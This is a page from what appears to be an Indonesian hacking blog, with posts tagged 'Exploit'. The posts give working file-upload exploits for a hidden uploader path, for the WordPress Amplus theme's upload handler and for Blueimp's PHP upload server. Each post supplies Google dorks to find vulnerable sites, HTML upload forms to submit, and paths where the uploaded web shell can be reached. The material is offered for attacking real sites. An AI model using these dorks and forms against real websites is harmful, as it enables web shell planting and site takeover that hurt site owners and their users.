Popular Posts

Showing posts with label Exploit. Show all posts

  • Hidden Uploader

    By : Unknown

    0 Comment
    - intitleTongueayPal Account Checker
    - intitleTongueayPal Email Valid Checker
    Exploit : /function.php?76=browser
     Kalo emang ada hidden uploadernya nanti bakal muncul uploader disitu , 
    Shell aksesnya , site.coli/shell.php / site.co.li/path/shell.php

    Btw path itu yang biasa ada didepan sitenya , jembut/wp/ < wpnya path dari wordpress , jadi kalo mau exploit didepan pathnya 

    Sekian dan terimagaji
    Sumber : Post diambil dari Forum IndoXploit yang post oleh Condet6etar

  • Wordpress Amplus Themes CSRF File Upload Vulnerability

    By : Unknown

    0 Comment
    #Title : Wordpress Amplus Themes CSRF File Upload Vulnerability
     
    #Author : DevilScreaM
     
    #Date : 11/17/2013 - 17 November 2013
     
    #Category : Web Applications
     
    #Type : PHP
     
    #Vendor : http://themeforest.net
     
    #Download : http://themeforest.net/item/amplus-responsive-multilingual-wordpress-theme/
     
    #Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
         Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber
     
    #Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |
     
    #Tested : Mozila, Chrome, Opera -> Windows & Linux
     
    #Vulnerabillity : CSRF
     
    #Dork :
     
    inurl:wp-content/themes/amplus
     
     
    CSRF File Upload Vulnerability
     
    Exploit & POC :
     
    http://site-target/wp-content/themes/amplus/functions/upload-handler.php
     
    Script :
     
    <form enctype="multipart/form-data"
    action="http://127.0.0.1/wp-content/themes/amplus/functions/upload-handler.php" method="post">
    Your File: <input name="uploadfile" type="file" /><br />
    <input type="submit" value="upload" />
    </form>
     
     
    File Access :
     
    http://site-target/uploads/[years]/[month]/your_shell.php
     
    Example : http://127.0.0.1/wp-content/uploads/2013/11/devilscream.php

    Sourcode Site

  • Exploit Blueimp File Upload

    By : Unknown

    0 Comment

    Dork      : /blueimp/server/php/
    Exploit  :/blueimp/server/php/
    Author   :DeshuAru

    CSRF :

     <form method="POST" action="http://site.lu/path/blueimp/server/php/"
    enctype="multipart/form-data">
    <input type="file" name="files[]" /><button>Upload</button>
    </form>

    Acces Shell : path/blueimp/server/php/file/shell.php

    • Subscribe to: Posts (Atom)

    Nisekoi Template Designed by Johanes Djogan

    ©2016 - ReDesigned By Ani-Sudo